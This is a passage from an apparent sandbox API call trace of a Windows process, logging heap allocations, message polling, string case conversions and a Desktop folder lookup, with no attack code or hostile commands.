Size=0x10) returned 0x34aa640 [0163.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.488] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0163.489] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.489] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.489] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0163.490] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0163.490] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0163.490] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.490] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0163.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.491] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.492] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.492] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.492] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0163.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0163.493] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0163.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.494] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0163.494] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.494] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0163.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.495] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0163.495] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.495] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0163.495] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.495] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0163.495] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.495] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0163.495] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.495] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.495] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.495] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.495] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.495] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.495] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0163.496] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.496] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0163.496] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.496] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.496] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0163.496] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.496] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.496] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.496] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.496] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.496] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0163.496] FreeLibrary (hLibModule=0x74d40000) returned 1 [0163.496] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.496] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.496] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.496] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.497] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0163.497] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0163.497] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0163.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0163.497] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0163.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0163.498] RtlAllocateHeap 